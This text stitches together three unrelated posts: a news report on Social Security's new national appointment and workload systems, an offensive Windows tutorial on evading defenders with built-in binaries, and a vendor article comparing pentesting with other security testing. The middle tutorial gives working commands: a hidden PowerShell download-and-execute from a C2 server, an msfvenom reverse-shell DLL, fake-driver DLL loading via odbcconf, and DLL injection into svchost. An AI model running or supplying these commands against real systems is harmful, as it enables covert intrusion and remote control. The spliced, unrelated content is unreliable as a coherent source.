The Social Security Administration is rolling out nationwide systems in the coming months that will impact how the agency schedules appointments for initial claims and triages its workload to employees.

SSA employees told Federal News Network that they’re used to processing claims submitted locally, but will soon tackle a nationwide inventory of cases.

Employees are wary that these changes will introduce more complexity to their workloads, as well as a higher risk of overpayments that SSA would have to claw back.

“Someone who applies in California could be speaking to an SSA rep in Maine,” one SSA employee said.

SSA is rolling out a National Appointment Scheduling Calendar (NASC) and National Workload Management (NWLM) for all field operations, digital services, and processing centers. Both systems will launch on March 7.

According to a Dec. 19 memo obtained by Federal News Network, the NASC will replace SSA’s current system for scheduling initial claims appointments, as well as local field office calendars.

SSA employees will use the NASC to schedule all initial claims appointments, and will also allow the public to self-schedule initial claims appointments.

The National Workload Management system will serve as the agency’s central workload management system. According to the memo, the system will distribute work to employees nationwide based on their “skillset, knowledge, and availability.”

“Employees will be assigned work by the NWLM based on the skillsets that they have, as determined by management. As a normal part of their routine duties, employees will be assigned to the NWLM and will be expected to use the tool to receive their workload assignments,” the memo states.

These systems will impact all employees in SSA field offices, digital services and processing centers.

“Both the NASC and NWLM are necessary to modernize our appointment systems and to provide a more balanced and consistent experience for both technicians and customers,” the memo states.

Richard Couture, president of the American Federation of Government Employees Council 215, said the union received notice of these changes, and that negotiations will soon begin.

A second SSA employee told Federal News Network that the purpose of these changes is to “smooth over” staffing shortages. The agency lost about 7,000 employees through voluntary incentives last year. It also relocated many of its employees from its headquarters and regional offices to field offices.

The employees said these upcoming changes would give staff “much less prep time” to handle a nationwide pool of cases.

“We are used to taking claims only for people in our area, so we expect to run into problems,” the second SSA employee said.

State laws introduce another layer of complexity to these cases. Some states, for example, have a higher income limit for SSA programs like Supplemental Security Income.

SSA employees outside Alaska aren’t familiar with how to treat annual payments adult residents receive from the state government based on oil revenue. Those payments from the Permanent Fund Dividend count as income to SSA programs like Social Security Income, and could potentially reduce benefits.

Many states offer a supplement to SSI benefits to help cover living costs for low-income seniors, as well as blind or disabled individuals. Those supplement amounts and eligibility vary state-by-state.

Some states let SSA manage these supplements, resulting in one combined check, while other states process their SSI supplements as a separate payment. Other states don’t offer these SSI supplements.

“We don’t have answers on how we are supposed to handle this,” the second SSA employee said.

The first SSA employee said staff were briefed on these changes this week. The employee said staff submitted multiple requests to management seeking clarification on these points, but were told to “worry about today, not tomorrow.”

Andy Sriubas, SSA’s chief of field operations, told employees in a Nov. 25 memo that the agency is taking steps to centralize more of its work.

“For decades, our ~1,250 field offices have operated as independent ‘mini-SSAs.’ That model no longer serves the public or our people. It prevents true specialization, limits the impact of technology, and produces backlogs we should not sustain,” he wrote.

Sriubas wrote that field offices “will always remain” as the agency’s primary point of contact in in-person services, and field office staff should be able to focus on serving people “face-to-face with empathy, accuracy, and speed.”

“Still too often, a day’s work is not finished in a day – impacting wait times, appointments, and pending items. That is not the level of service the American people deserve, nor is it the standard any of us should accept,” Sriubas wrote.

Sriubas wrote the agency’s website and the national 1-800 number handle “intake tasks well,” but said field operations “must evolve into a truly national system that leverages our full capacity.”

“The future is one SSA: a modern, client-centered agency where people receive service how, when and where they want it — online, by phone, or in person — regardless of their physical location, and every workflow flows to the team best equipped to complete it quickly and correctly,” he wrote.

SSA walks back memo limiting in-person services

In a separate memo, which an SSA spokesperson said has been rescinded, the agency directed field offices to only schedule initial claims over the phone, and to restrict in-person visits.

The memo, dated Dec. 31, directed field office employees to “convert all in-office appointments” scheduled on or after Jan. 6 to telephone appointments, and to “zero out all in-office availability” for appointments scheduled on or after March 9.

“This change prepares field offices and teleservice centers for the upcoming implementation of the National Appointment Scheduling Calendar,” the memo states.

The memo said in-person initial claim appointments would only be scheduled in “limited circumstances” when an appointment over the phone isn’t possible. Examples include an individual requiring a sign-language interpreter or who doesn’t have access to a phone.

“Only field office management may decide if an in-office appointment is appropriate; technicians must obtain permission from local management prior to scheduling the appointment,” the memo states.

According to this memo, the NASC will allow SSA to schedule initial claim appointments “based on national capacity, rather than local field office calendars.”

“Under NASC, [initial claim] appointments will be scheduled using available technician capacity nationwide, including first available appointment times across all U.S. time zones,” the memo states. “This shift supports a more consistent and efficient approach to IC scheduling and expands access by allowing the public to self-schedule IC appointments online.”

An SSA spokesperson told Federal News Network that “erroneous instructions recently issued have been withdrawn and our employees have been notified.”

The spokesperson said in a statement that the agency is still scheduling in-person appointments for initial claims, “and will continue to provide the public with in-person service at our more than 1,200 field offices nationwide.”

“We remain committed to ensuring that all individuals have access to the services they need and serving everyone in the way they wish to be served, including the option for in-person assistance,” the spokesperson said.

The second SSA employee, however, told Federal News Network that these plans will proceed, even if the memo outlining these changes has been rescinded.

“They are absolutely going forward with this plan. I expect there could be delays, but they have every intention of making this happen,” the employee said.

SSA is looking to cut visits to its field offices in half this year. NextGov/FCW first reported on SSA’s plans to cut 15 million field office visits this year.

The post Social Security seeks nationwide system to manage caseload for smaller workforce first appeared on Federal News Network.

© AP Photo/Nam Y. Huh

Welcome back, cyberwarriors! 

We hope that throughout the Survival series, you have been learning a lot from us. Today, we introduce Living off the Land techniques that can be abused without triggering alarms. Our goal is to use knowledge from previous articles to get our job done without unnecessary attention from defenders. All the commands we cover in two parts are benign, native, and also available on legacy systems. Not all are well-known, and tracking them all is impossible as they generate tons of logs that are hard to dig through. As you may know, some legitimate software may act suspiciously with its process and driver names. Tons of false positives quickly drain defenders, so in many environments, you can fly under the radar with these commands. 

Today, you’ll learn how to execute different kinds of scripts as substitutes for .ps1 scripts since they can be monitored, create fake drivers, and inject DLLs into processes to get a reverse shell to your C2.

Let’s get started!

Execution and Scripting

Powershell

Let’s recall the basic concepts of stealth in PowerShell from earlier articles. PowerShell is a built-in scripting environment used by system administrators to automate tasks, check system status, and configure Windows. It’s legitimate and not suspicious unless executed where it shouldn’t be. Process creation can be monitored, but this isn’t always the case. It requires effort and software to facilitate such monitoring. The same applies to .ps1 scripts. This is why we learned how to convert .ps1 to .bat to blend in in one of the previous articles. It doesn’t mean you should avoid PowerShell or its scripts, as you can create a great variety of tools with it. 

Here’s a reminder of how to download and execute a script in memory with stealth:

PS > powershell.exe -nop -w h -ep bypass -c "iex (New-Object Net.WebClient).DownloadString('http://C2/script.ps1')"

Walkthrough: This tells PowerShell to start quickly without loading user profile scripts (-nop), hide the window (-w h), ignore script execution rules (-ep bypass), download a script from a URL, and run it directly in memory (DownloadString + Invoke-Expression).

When you would use it: When you need to fetch a script from a remote server and run it quietly.

Why it’s stealthy: PowerShell is common for admin tasks, and in-memory execution leaves no file on disk for antivirus to scan. Skipping user profile scripts avoids potential monitoring embedded in them.

A less stealthy option would be:

PS > iwr http://c2/script.ps1 | iex 

It’s important to keep in mind that Invoke-WebRequest (iwr) and Invoke-Expression (iex) are often abused by hackers. Later, we’ll cover stealthier ways to download and execute payloads.

CMD

CMD is the classic Windows command prompt used to run batch files and utilities. Although this module focuses on PowerShell, stealth is our main concern, so we cover some CMD commands. With its help, we can chain utilities, redirect outputs to files, and collect system information quietly.

Here’s how to chain enumeration with CMD:

PS > cmd.exe /c "whoami /all > C:\Temp\privs.txt & netstat -ano >> C:\Temp\privs.txt"

Walkthrough: /c runs the command and exits. whoami /all gets user and privilege info and writes it to C:\Temp\privs.txt. netstat -ano appends active network connections to the same file. The user doesn’t see a visible window.

When you would use it: Chaining commands is handy, especially if Script Block Logging is in place and your commands get saved.

Why it’s stealthy: cmd.exe is used everywhere, and writing to temp files looks like routine diagnostics.

cscript.exe

This runs VBScript or JScript scripts from the command line. Older automation relies on it to execute scripts that perform checks or launch commands. Mainly we will use it to bypass ps1 execution monitoring. Below, you can see how we executed a JavaScript script.

PS > cscript //E:JScript //Nologo C:\Temp\script.js

Walkthrough (plain): //E:JScript selects the JavaScript engine, while //Nologo hides the usual header. The final argument points to the script that will be run.

When you would use it: All kinds of use. With the help of AI you can write an enumeration script.

Why it’s stealthy: It’s less watched than PowerShell in some environments and looks like legacy automation.

wscript.exe

By default, it runs Windows Script Host (WSH) scripts (VBScript/JScript), often for scripts showing dialogs. As a pentester, you can run a VBScript in the background or perform shell operations without visible windows.

PS > wscript.exe //E:VBScript C:\Temp\enum.vbs //B

Walkthrough: //B runs in batch mode (no message boxes). The VBScript at C:\Temp\enum.vbs is executed by the Windows Script Host.

When you would use it: Same thing here, it really depends on the script you create. We made a system enumeration script that sends output to a text file. 

Why it’s stealthy: Runs without windows and is often used legitimately.

mshta.exe

Normally, it runs HTML Applications (HTA) containing scripts, used for small admin UIs. For pentesters, it’s a way to execute HTA scripts with embedded code. It requires a graphical interface.

PS > mshta users.hta 

Walkthrough: mshta.exe runs script code in users.hta, which could create a WScript object and execute commands, potentially opening a window with output.

When you would use it: To run a seemingly harmless HTML application that executes shell commands

Why it’s stealthy: It looks like a web or UI component and can bypass some script-only rules.

DLL Loading and Injections

These techniques rely on legitimate DLL loading or registration mechanics to get code running.

Rundll32.exe

Used to load a DLL and call its exported functions, often by installers and system utilities. Pentesters can use it to execute a script or function in a DLL, like a reverse shell generated by msfvenom. Be cautious, as rundll32.exe is frequently abused.

C:\> rundll32.exe C:\reflective_dll.x64.dll,TestEntry

Walkthrough: The command runs rundll32.exe to load reflective_dll.x64.dll and call its TestEntry function.

When you would use it: To execute a DLL’s code in environments where direct execution is restricted.

Why it’s stealthy: rundll32.exe is a common system binary and its activity can blend into normal installer steps.

Regsvr32.exe

In plain terms it adds or removes special Windows files (like DLLs or scriptlets) from the system’s registry so that applications can use or stop using them. It is another less frequently used way to execute DLLs.

PS > regsvr32.exe /u /s .\reflective_dll.x64.dll

Walkthrough: regsvr32 is asked to run the DLL. /s makes it silent. 

When you would use it: To execute a DLL via a registration process, mimicking maintenance tasks.

Why it’s stealthy: Registration operations are normal in IT workflows, so the call can be overlooked.

odbcconf.exe

Normally, odbcconf.exe helps programs connect to databases by setting up drivers and connections. You can abuse it to run your DLLs. Below is an example of how we executed a generated DLL and got a reverse shell

bash > msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.15.57 LPORT=4444 -f dll -o file.dll

PS > odbcconf.exe INSTALLDRIVER “Printer-driverX|Driver=C:\file.dll|APILevel=2”

PS > odbcconf.exe configsysdns “Printer-driverX” “DNS=Printer-driverX”

Walkthrough: The first odbcconf command tells Windows to register a fake database driver named “Printer-driverX” using a DLL file. The APILevel=2 part makes it look like a legitimate driver. When Windows processes this, it loads file.dll, which runs a reverse shell inside of it. The second odbcconf command, creates a system data source (DSN) named “Printer-driverX” tied to that fake driver, which triggers the DLL to load again, ensuring the malicious code runs.

When you would use it: To execute a custom DLL stealthily, especially when other methods are monitored.

Why it’s stealthy: odbcconf is a legit Windows tool rarely used outside database admin tasks, so it’s not heavily monitored by security tools or admins on most systems. Using it to load a DLL looks like normal database setup activity, hiding the malicious intent.

Installutil.exe

Normally, it is a Windows tool that installs or uninstalls .NET programs, like DLLs or executables, designed to run as services or components. It sets them up so they can work with Windows, like registering them to start automatically, or removes them when they’re no longer needed. In pentest scenarios, the command is used to execute malicious code hidden in a specially crafted .NET DLL by pretending to uninstall it as a .NET service.

PS > InstallUtil.exe /logfile= /LogToConsole=false /U file.dll

Walkthrough: The command tells Windows to uninstall a .NET assembly (file.dll) that was previously set up as a service or component. The /U flag means uninstall, /logfile= skips creating a log file, and /LogToConsole=false hides any output on the screen. If file.dll is a malicious .NET assembly with a custom installer class, uninstalling it can trigger its code, like a reverse shell when the command processes the uninstall. However, for a DLL from msfvenom, this may not work as intended unless it’s specifically a .NET service DLL.

When you would use it:. It’s useful when you have admin access and need to execute a .NET payload stealthily, especially if other methods are unavailable.

Why it’s stealthy: Install utilities are commonly used by developers and administrators.

Mavinject.exe

Essentially, it was designed to help with Application Virtualization, when Windows executes apps in a virtual container. We use it to inject DLLs into running processes to get our code executed. We recommend using system processes for injections, such as svchost.exe.Here is how it’s done:

PS > MavInject.exe 528 /INJECTRUNNING C:\file.dll

Walkthrough: Targets process ID 528 (svchost.exe) and instructs MavInject.exe to inject file.dll into it. When the DLL loads, it runs the code and we get a connection back.

Why you would use it: To inject a DLL for a high-privilege reverse shell, like SYSTEM access. 

Why it’s stealthy: MavInject.exe is a niche Microsoft tool, so it’s rarely monitored by security software or admins, making the injection look like legitimate system behavior.

Summary

Living off the Land techniques matter a lot in Windows penetration testing, as they let you achieve your objectives using only built-in Microsoft tools and signed binaries. That reduces forensic footprints and makes your activity blend with normal admin behavior, which increases the chance of bypassing endpoint protections and detection rules. In Part 1 we covered script execution and DLL injections, some of which will significantly improve your stealth and capabilities. In Part 2, you will explore network recon, persistence, and file management to further evade detection. Defenders can also learn a lot from this to shape the detection strategies. But as it was mentioned earlier, monitoring system binaries might generate a lot of false positives. 

Resources:

https://lofl-project.github.io

https://lolbas-project.github.io/#

The post PowerShell for Hackers – Survival Edition, Part 4: Blinding Defenders first appeared on Hackers Arise.

By Kim Crawley

Not everything that’s called “pentesting” is pentesting. There’s an abundance of different types of security testing and tools that use different methodologies for different stakeholders with differing agendas. Security testing, which includes pentesting and also vulnerability assessment, compliance auditing and other formats, is even broader. We’ll break down the differences between types of pentesting and strategies that are labeled pentesting but are fundamentally different. 

First, what are you testing for?

Are you trying to penetrate a network or computer system like a cyber threat actor, but with permission from the owner for the purposes of discovering security vulnerabilities? Then chances are what you’re doing is pentesting. If you’re using a checklist of security standards of some sort and looking for vulnerabilities without simulating cyber attacks, that’s a vulnerability assessment. It sounds obvious, but some entities try to sell vulnerability assessments by incorrectly calling them pentests. Pentests aren’t “better” than vulnerability assessments–they’re different types of security testing. Each can be the best solution for different problems.

The Flavors of Pentesting

Pentesting is having specially trained people simulate cyber attacks. They can use applications, scripts and even conduct analog activities such as social engineering and physical security pentesting. Its strength and weakness is the people doing the testing and the platform they work on. Without good testers on an efficient platform, the test may not leave the buyer with confidence. Traditional pentesting relies on only the skills of a few people and outputs a readable report, not data. Synack was founded to get the best testers on the best platform for the best pentest possible. A pentest’s output – at least Synack style – is real-time access to findings, remediation information, analytics about testing and more.

Different types of pentesting can be categorized according to which facet of a computer system is being tested. The majors are network pentesting, application pentesting, social engineering pentesting that finds vulnerabilities in people and physical pentesting that finds vulnerabilities in buildings, doors, windows, rooms and the like. 

Pentesting is also categorized according to the information available to the testers. Blackbox testing is done with little to no knowledge of a target from the perspective of an external attacker. Whitebox testing is done with in-depth target knowledge from the perspective of an internal attacker in the target’s IT department. And Greybox testing is in the middle from the perspective of a nontechnical insider. 

There are also other ways to prepare for cyber threats that are different from pentesting. Let’s explore some of them. 

Methodologies for Security Testing (That Aren’t Pentesting)

Breach and Attack Simulation (BAS) based on attack replay or scripting is a relatively recent development in security testing tech. Scripts that simulate specific exploits can be executed whenever an administrator needs to test a particular attack. This way, teams are better trained to know how to spot attack patterns and unusual log activity. When the cybersecurity community discovers new exploits, scripts can be used to simulate those exploits. Note that that takes time, so BAS may not be as current as adversarial tradecraft. The testing-like output is confirmation how many known vulnerabilities with easily scriptable exploits exist in your environment. 

BAS is best suited for testing security responses to ensure teams know how to spot attack patterns and strange attacks in their log systems. This is a great training tool for blue teams but will not result in the discovery of unknown vulnerabilities in general. This shouldn’t be viewed as a pen test replacement and usually the scripted models lag the current adversary tradecraft. 

Bug Bounty welcomes members of the general public under well defined policies to security test your software themselves and submit bug reports to your company according to the principles of responsible disclosure. If a bug can be proven and fits your company’s criteria of a prioritized vulnerability, the bug hunter could be awarded a monetary prize of anywhere from $50 to $100,500, but typical bug bounty rewards are about $200 to $1,000. The amount of money awarded for a valuable bug report is affected by several factors including the size of the company’s budget and user base and the criticality of the bug.

Dynamic Application Security Testing (DAST) is an automated technique, but it’s exclusively for testing working applications. So it’s often a tool used by application developers. DAST is used most often for web applications, but other internet-connected applications can be tested this way too. The targeted application must be running, such as a web application on the internet. The exploits that are executed are dynamic, so they may alter course depending on the progress of penetration. 

Risk assessments are sometimes called threat evaluations. In a risk assessment, your security team collaborates with what they know about your organization’s data assets and how those assets could be threatened, both by cyber attack and by non-malicious threats such as natural disasters and accidents. Risks are identified, estimated and prioritized according to their probability of occurring and the amount of harm that could result.

Static Application Security Testing (SAST) has the same goals as DAST, but for application code before being compiled, not for applications that are running in production mode. If a vulnerability is clear from source code – and not all are – it can be detected by SAST.

Tabletop exercises are mainly for incident response teams, a defensive security function. They can be a fun challenge when done well, and help your incident response group face cyber threats with greater confidence. Specific attacks are proposed in the exercise, and the team needs to figure out how they should prevent, mitigate, or contain the cyber threat. If Capture The Flag is the main educational game for the red team, tabletop is the main educational game for the blue team. The output is a more confident and prepared team. Sometimes, refinements for an organization’s threat modeling also emerge. But actual vulnerabilities will not often be found during these exercises.

These and other newer technologies (artificial intelligence and machine learning in particular) are useful tools for security leaders. Computer software acts faster and doesn’t get tired, but the most flexible thinking comes directly from human beings. 

Computer scientists know that computers can only simulate randomness, it takes a living being to actually be random. And human pentesters, like the Synack Red Team, are the best at simulating human cyber attackers and the serious exploits they regularly find.

For a deeper look at the Synack Red Team and its diverse skill set, read our latest white paper, “Solving the Cyber Talent Gap with Diverse Expertise.”

The post What You’re Missing About Pentesting: 6 Tools That Look Like Pentesting But Aren’t appeared first on Synack.